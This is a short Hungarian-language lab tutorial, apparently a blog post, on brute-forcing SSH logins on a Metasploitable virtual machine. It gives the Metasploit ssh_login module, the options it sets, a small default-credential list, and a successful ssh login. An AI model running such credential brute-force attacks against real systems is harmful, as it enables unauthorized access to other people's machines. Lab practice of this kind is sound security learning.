Az ftp után jöjjön a 22-es port.
msfconsole
search ssh login
másoljuk ki a következő találatot és állítsuk be a use paranccsal
use auxiliary/scanner/ssh/ssh_login
nézzük meg miket kell beállítani
show options
a következőket kell megadni RHOSTS, ez lesz a metasplitable ip címe.
Ami még kötelező az bizony egy külső fájl amiből a brute forcehoz szedi be lehetőségeket, itt több lehetőség közül is választhatunk, már ami a list formáját illeti. Megadhatunk külön jelszó és felhasználóneveket tartalmazó fileokat. Megadhatunk olyat ahol egy sorban, szóközzel vannak elválasztva a bejelentkezési adatok, és megadhatjuk azt is hogy csak felhasználóneveket tartalmaz a lista, és az adott felhasználónév lesz a jelszó is. Lássuk be van erre sok példa :)
Én a USERPASS_FILE mellett döntöttem, azaz egy sorban szóközzel elválasztva csináltam egy listát. Nem kell hosszú lista, hiszen inkább az a lényeg hogy hogy működik msfconsole-ban az ssh bruteforce. Az enyém a következőképp néz ki:
admin admin
root root
user pass
msfadmin login
msfadmin msfadmin
bizony, az utolsó sor a megfejtés.
adjuk meg ennek a filenak az elérési útját
set USERPASS_FILE /home/.../elérési út
majd a kényelem és az időspórolás kedvéért még két kapcsolót állítsunk true-ra, VERBOSE, STOP_ON_SUCCESS.
Előbbi segítségével láthatjuk hogy miket próbált meg, utóbbi pedig az első sikeres párosnál megáll.
Ellenőrizzük is le :)
ssh msfadmin@192.186.xxx.xxx
yes
msfadmin
és bent is vagyunk :)